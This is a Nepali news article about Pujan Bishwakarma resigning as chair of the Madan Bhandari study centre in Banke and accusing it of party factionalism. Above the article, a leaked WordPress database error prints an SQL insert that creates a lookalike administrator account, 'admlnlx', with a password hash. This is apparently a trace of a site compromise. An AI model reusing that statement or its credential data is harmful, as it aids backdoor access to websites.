WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9OIoTquOrubeXCCgY0Ye98nKVzWZ.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 11:46:44', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,मंसिर २६-
मदन भण्डारी अध्यन केन्द्र बाँकेका अध्यक्ष पुजन विश्वकर्माले पदवाट राजिनामा दिएका छन् । राजिनामा संगै उनले सम्पुर्ण कार्यसमिति विघठन गरेको जनाएका छन् । आज एक विज्ञप्ती जारी गर्दै विश्वकर्माले अध्यन केन्द्रले अनावश्यक गुटवन्दी गरेको आरोप लगाएका छन् ।देशव्यापी रुपमा एमालेको पक्षमा जनलहर सृजना भएको समयमा पार्टी भित्र विभिन्न संघ संस्थाको नाममा गुटवन्दी गर्नु उचित नहुने देखेर राजिनामा दिएको उनले नारायणी अनलाइनलाई वताए ।
विश्वकर्माले पार्टी प्रदेश इन्र्चाज विष्णु पौडेलले नेपालगन्जमा भएको कार्यक्रममा कुनैपनि गुटउपगुटमा नलाग्न नेता कार्यकर्तालाई निर्देशन गरेको स्मरण गर्दै पार्टीको जिम्मेवारीमा दृढतापुर्वक लाग्ने वताए ।उनले पार्टी वलियो वनाउन मदन भण्डारी अध्ययन केन्द्र आवश्यक नरहेको समेत प्रतिकृया दिए ।केहि महिना अघि मात्र नेपालगन्जमा पार्टी सचिव तथा मदन भण्डारी फाउण्डेशनका अध्यक्ष योगेश भट्टराईको उपस्थितिमा विश्वकर्मा अध्यक्ष चयन भएका थिए ।